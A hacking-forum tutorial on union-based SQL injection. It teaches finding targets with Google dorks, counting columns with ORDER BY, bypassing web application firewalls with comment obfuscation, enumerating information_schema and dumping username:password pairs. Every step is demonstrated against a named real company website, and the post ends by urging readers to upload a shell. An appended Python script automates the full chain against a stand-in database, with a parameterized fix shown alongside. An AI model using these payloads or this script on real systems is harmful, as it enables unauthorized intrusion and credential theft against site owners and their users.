Assalamu Alaikum
Şhâhbâz here from Cyber Comondos.
We have already seen how to create databases, tables and columns and how to add records to them in different ways. Now,
in this article, we will cover SQL injection: how a website can be hacked using it.
Please comment here if you like it; it took me an hour and a half to complete.
What is SQL injection?
SQL injection is one of the most common ways websites get hacked.
SQL injection is a big topic. Newbies think it is no big deal because they can exploit
the vulnerability with tools like sqlmap, Havij or sqlninja and other point-and-click scripts,
but SQL injection is a large enough subject that it could fill many books.
So what can you do with SQL injection?
You can read records,
you can modify records,
you can bypass login forms,
you can compromise the database server itself.
Okay, here our first step begins:
Finding vulnerable websites.
If you are a hacker, you must know that
search engines are your best friends.
We can find candidate websites
using Google dorks.
Common dorks are
inurl:/index.php?id=
inurl:/home.php?id=
inurl:/article.php?id=
inurl:/news.php?id=
Search for any one of these and you will find many websites. Open any of them
and you will see a URL like
www.website.com/index.php?id=1
To test whether the site is vulnerable, put a ' at the end of the URL
so it looks like
www.website.com/index.php?id=1'
If you see an error like this
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server
version for the right syntax to use near '\'' at line 1
or
Warning: mysql_fetch_array()
or any other MySQL error, or if some of the page content goes missing,
then the parameter is most likely injectable: the quote broke out of the value the query expected, and the application is echoing the database error (or silently failing the query).
Example:
(screenshot: the page returns a MySQL error, so the website is vulnerable)
So now let's move to the next step:
EXPLOITING the vulnerability
Now that we have found a vulnerable website, it's time to fetch the hidden data.
Our next step is to find the number of columns in the query's SELECT.
For that we replace the ' with an ORDER BY clause,
like this:
website.com/index.php?id=1 order by 1--
website.com/index.php?id=1 order by 2--
website.com/index.php?id=1 order by 3--
website.com/index.php?id=1 order by 4--
We keep increasing the ORDER BY number until we get an error like
"Unknown column '21' in 'order clause'" or some content goes missing from the page.
For example,
http://www.cementcorporation.co.in/page.php?id=20 order by 1-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 2-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 3-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 10-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 20-- NO ERROR
http://www.cementcorporation.co.in/page.php?id=20 order by 21-- ERROR / CONTENT MISSING IN PAGE
So we got an error at ORDER BY 21 but no error at ORDER BY 20,
which means the query selects 20 columns (ORDER BY n sorts by the n-th selected column, so it fails as soon as n exceeds the column count).
Sometimes this never works and we get no error even at ORDER BY 1000.
In that case the parameter is probably inside quotes in the query, so we put a ' after the id value and a + at the end of the comment,
like
http://www.cementcorporation.co.in/page.php?id=20' order by 21--+ error
(the ' closes the string, and the + is URL-decoded to a space, which MySQL requires after -- for it to count as a comment.)
Now the next step begins:
Union Select
Now that we know there are 20 columns, it's time to select all of them with UNION SELECT.
The SELECT statement is used to read data; if you want to learn more about SQL, you can check my
article on working with SQL.
We use a statement like this:
http://www.cementcorporation.co.in/page.php?id=20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
Now you should see some of the column numbers on the page,
like 1, 5 and 7, or whichever ones the page renders.
If you don't see any, put a - before the parameter value so the original row matches nothing and only the injected row is displayed.
Example:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
You can see in the picture below
(screenshot) that 3 and 4 show up on the web page. These two are string columns
that the page renders, so we can retrieve our data through them.
Sometimes UNION SELECT does not work because of a WAF (web application firewall); then we obfuscate the keywords with comments, like
/*!union*/+/*!select*/
/*!union*/+(/*!select*/
un/**/ion+sel/**/ect+1,2,3--
/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3--
or change the case
/*!UnIOn*//*!SeLect*/+1,2,3--
etc. (/*! ... */ is a MySQL version-conditional comment that the server still executes, and + becomes a space after URL decoding. Which of these get past a given WAF, and which the MySQL version in use still parses, varies; splitting a keyword with /**/ in particular only works on older servers.)
Now it's time to retrieve data through these columns.
We can pull sensitive information with built-in functions: database() for the database name, version() or @@version for version info, user() for the database user,
concat(), group_concat(), LOAD_FILE() and many more.
For the tutorial I will call version() in column 3 and put the database and user info in
column 4 using group_concat().
For that I will use
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,version(),group_concat(database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--
I used 0x3a because it is the hex value of a colon ( : ); MySQL accepts a hex literal as a string, so it separates the two values without needing a quote character in the URL.
Now you can see in the image that columns 3 and 4 have been replaced by the values I called.
Okay, next thing:
How to find all the databases on the server?
That's easy.
We replace the column marker with a query on information_schema,
like this:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(schema_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.schemata--
See:
Now we know there are basically two databases,
information_schema and cementco_cement.
Ignore information_schema.
Why? Because information_schema holds the system tables that describe
the databases; we use it to look at the database layout, not as a target.
Okay, now we have our database. (We don't actually need its name: if we are dumping from the current database we can use
the database() function instead of cementco_cement. The literal name is only needed when dumping from a database other than the current one,
and in this case we will just do a simple dump.)
Now let's find the tables in the current database.
This time we add a WHERE condition to the query:
we fetch the table names with SELECT and use WHERE to choose which database's tables we want.
Okay,
syntax:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(table_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.tables where table_schema=database()--
Now you can see we have all the table names,
which are
archive,corrigendum,eselling,login,login_hindi,login_private,news,tbl_complaint,tbl_email_sender,tbl_email_sender_hindi,tbl_email_sender_private,tbl_home_animation,tbl_home_private,tbl_pages,tbl_pages_hindi,tbl_pages_private,tbl_sub_pages,tbl_tnc,tender,tender2,tender3,tender_drawing,unit
Now we are going to dump a sensitive table,
which is login.
Okay, let's dump it.
We replace group_concat(table_name) with group_concat(column_name) and information_schema.tables with information_schema.columns,
and in the WHERE condition we change table_schema to table_name
and give it the table name in quotes, like
table_name='login'
Why quotes? Because the column is a varchar.
Sometimes the quote gets filtered or escaped by the application,
so we convert the name to MySQL CHAR() codes; I use HackBar for that.
The CHAR value of login is CHAR(108, 111, 103, 105, 110) (the ASCII codes of l, o, g, i, n),
so now our query looks like this:
http://www.cementcorporation.co.in/page.php?id=-20
union select
1,2,3,group_concat(column_name),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20
from information_schema.columns where table_name=CHAR(108, 111, 103, 105, 110)--
Now we can see the columns of the table 'login',
which are id,username,password,email,date_added,lastlogin,sessionid,type,status
Okay, now the fun begins: time to dump the columns.
For example, to dump the username and password columns from the table 'login', we change the query to
select group_concat(username,0x3a,password) from login--
Dumped.
Syntax:
http://www.cementcorporation.co.in/page.php?id=-20 union select 1,2,3,group_concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from login--
You can see username:password pairs on the web page.
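The whole chain above (ORDER BY to count columns, UNION SELECT with digit markers to find the rendered ones, then pulling table names, column names and rows through one of them), automated end to end, as an added example that is not code from the original post. It runs against an in-memory SQLite database that stands in for the MySQL site: sqlite_master and pragma_table_info play the role of information_schema.tables and information_schema.columns, and || replaces concat(). The tables, rows, and the two page functions (page_vulnerable, page_hardened) are constructed for the demo; the hardened version shows the fix, validating the parameter and binding it instead of concatenating it, and the same attacker code gets nothing out of it.

```python
"""Union-based SQL injection, end to end, against an in-memory SQLite stand-in
for the MySQL site in the tutorial. Added example, not code from the original
post: the tables, rows and page functions below are constructed for the demo."""
import re
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE pages (id INTEGER, title TEXT, body TEXT, hits INTEGER);
    CREATE TABLE login (id INTEGER, username TEXT, password TEXT);
    INSERT INTO pages VALUES (20, 'About us', 'Welcome to our site.', 7);
    INSERT INTO login VALUES (1, 'admin', '5f4dcc3b5aa765d61d8327deb882cf99');
    INSERT INTO login VALUES (2, 'editor', 'letmein');
""")

SQL_ERROR = "SQL ERROR"


def page_vulnerable(id_param):
    """page.php?id=... as the tutorial's target does it: the parameter is glued
    straight into the query. Four columns are selected, but only title and
    body (columns 2 and 3) are rendered."""
    sql = "SELECT id, title, body, hits FROM pages WHERE id=" + id_param
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return SQL_ERROR           # the "You have an error in your SQL syntax" case
    if row is None:
        return "<h1></h1><p></p>"  # the "content missing" case
    return f"<h1>{row[1]}</h1><p>{row[2]}</p>"


def page_hardened(id_param):
    """Same page with the fix: check the type, then bind the value."""
    if not re.fullmatch(r"-?\d+", id_param):
        return "invalid id"
    row = conn.execute("SELECT id, title, body, hits FROM pages WHERE id=?",
                       (int(id_param),)).fetchone()
    if row is None:
        return "<h1></h1><p></p>"
    return f"<h1>{row[1]}</h1><p>{row[2]}</p>"


# ---- attacker side: the tutorial's steps, automated ----

def find_column_count(page, base="20", limit=50):
    """ORDER BY n for n = 1, 2, ...: the last n that does not error is the
    number of columns in the page's SELECT."""
    for n in range(1, limit + 1):
        if page(f"{base} order by {n}--") == SQL_ERROR:
            return n - 1
    return None  # never errored: not injectable this way, or limit too low


def find_visible_columns(page, ncols, base="-20"):
    """UNION SELECT 1,2,...,n with an id that matches nothing, so only the
    injected row is rendered; the digits that show up are the usable columns."""
    markers = ",".join(str(i) for i in range(1, ncols + 1))
    html = page(f"{base} union select {markers}--")
    return [i for i in range(1, ncols + 1) if re.search(rf"\b{i}\b", html)]


def extract(page, ncols, column, expr, from_clause="", base="-20"):
    """Replace one visible column with an expression, wrapped in sentinels so
    the value can be pulled back out of the HTML (the tutorial uses 0x3a
    separators for the same purpose). SQLite concatenates with ||."""
    parts = [str(i) for i in range(1, ncols + 1)]
    parts[column - 1] = f"'<<'||({expr})||'>>'"
    html = page(f"{base} union select {','.join(parts)} {from_clause}--")
    m = re.search(r"<<(.*?)>>", html)
    return m.group(1) if m else None


def dump_credentials(page):
    """The whole chain: column count -> visible column -> tables -> columns -> rows.
    Returns None when any step fails (as it does against the hardened page)."""
    ncols = find_column_count(page)
    if not ncols:
        return None
    visible = find_visible_columns(page, ncols)
    if not visible:
        return None
    col = visible[0]
    # sqlite_master / pragma_table_info stand in for information_schema.tables / .columns
    tables = extract(page, ncols, col, "group_concat(name)",
                     "from sqlite_master where type='table'")
    if tables is None or "login" not in tables.split(","):
        return None
    columns = extract(page, ncols, col, "group_concat(name)",
                      "from pragma_table_info('login')")
    if columns is None:
        return None
    return extract(page, ncols, col, "group_concat(username||':'||password)", "from login")


if __name__ == "__main__":
    print("vulnerable:", dump_credentials(page_vulnerable))
    print("hardened:  ", dump_credentials(page_hardened))
```

Against page_vulnerable the run finds 4 columns, sees markers 2 and 3 rendered, and returns admin:5f4dcc3b5aa765d61d8327deb882cf99,editor:letmein; against page_hardened every probe gets "invalid id", so the column count never resolves and the dump returns None. The fix is not the type check alone (a string parameter would need the same treatment) but the bound parameter: the value never becomes part of the SQL text.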
Now just find the admin panel and upload a shell.
Was it easy? Yeah, but sometimes a WAF can mess with your head.
If you want any kind of help, reply here.
Thanks for reading,
Administrator Of FOCSoft